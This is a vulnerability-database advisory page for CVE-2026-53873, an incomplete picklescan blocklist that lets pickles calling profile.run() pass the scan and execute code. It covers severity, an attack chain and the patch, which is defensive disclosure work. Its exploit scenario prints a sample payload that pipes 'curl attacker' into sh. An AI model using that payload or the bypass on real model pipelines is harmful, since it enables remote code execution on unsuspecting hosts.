Skip to main content

picklescan CVE-2026-53873

CRITICAL
Incomplete List of Disallowed Inputs (CWE-184)
2026-06-17 VulnCheck
Python RCE Picklescan
9.3
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
9.3 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
vuln.today AI
9.8 CRITICAL

Bypass lets attacker-supplied pickle reach pickle.loads via a default-config scanner with no auth or user interaction, yielding full RCE on the loader host (C/I/A:H).

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 17, 2026 - 16:50 vuln.today
Analysis Generated
Jun 17, 2026 - 16:50 vuln.today

DescriptionCVE.org

picklescan before 1.0.4 contains an incomplete blocklist for the profile module that fails to block the module-level profile.run() function, allowing attackers to achieve arbitrary code execution via exec(). Attackers can craft malicious pickle files calling profile.run(statement) to execute arbitrary Python code while picklescan reports zero security issues.

AnalysisAI

Arbitrary code execution bypass in picklescan before 1.0.4 allows attackers to smuggle malicious pickle files past the scanner by invoking the module-level profile.run() function, which is missing from the blocklist that only covers Profile.run and Profile.runctx. The scanner reports zero issues while pickle.loads() triggers exec() of attacker-controlled Python. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Identify pipeline using picklescan <1.0.4
Delivery
Craft pickle invoking profile.run with payload
Exploit
Upload artifact to registry or model hub
Install
Scanner returns zero issues
C2
Victim deserializes via pickle.loads
Execute
exec() runs attacker Python
Impact
Full code execution in loader process
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The target environment must (a) use picklescan at a version below 1.0.4 as a pre-deserialization screening step and (b) subsequently call pickle.loads() (or equivalent) on a file whose contents the attacker controls, such as a third-party model checkpoint or uploaded artifact. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The supplied CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) and base score of 9.3 reflect that any system deserializing an attacker-supplied pickle that was previously cleared by picklescan can be fully compromised, which is realistic for ML model hubs, CI scanners, and Hugging Face-style download pipelines. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker uploads a malicious model or data artifact containing a pickle whose payload is profile.run("import os; os.system('curl attacker|sh')") to a repository or registry that uses picklescan <1.0.4 as its pre-deserialization safety gate. The scanner reports zero issues because the global name "run" does not match the blocklist entry "Profile.run", the downstream consumer calls pickle.loads(), and exec() runs the attacker statement in the loader's process. …
Remediation Vendor-released patch: upgrade picklescan to 1.0.4 or later, which extends the profile blocklist to also cover the module-level run function (advisory GHSA-7wx9-6375-f5wh). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Immediately disable picklescan as a security control and implement alternative mitigation (block pickle deserialization, restrict to whitelisted types, enforce code review of pickle sources). …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-48039 CRITICAL POC
9.1 Jun 11

Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API ac
CVE-2026-53753 CRITICAL
9.8 Jun 16

Unauthenticated remote code execution in Crawl4AI versions <= 0.8.6 allows attackers to escape the AST-based sandbox in

CVE-2026-48519 CRITICAL
9.6 Jun 16

Remote code execution in Langflow versions through 1.9.1 allows unauthenticated attackers to execute arbitrary Python co
CVE-2026-45833 CRITICAL
9.4 Jun 12

Authenticated remote code execution in ChromaDB Python project versions 0.4.17 and later enables attackers holding the U
CVE-2026-47103 CRITICAL
9.3 Jun 17

Remote code execution in python-statemachine 3.0.0 through 3.1.x allows attackers to run arbitrary Python in the host pr

Share

CVE-2026-53873 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy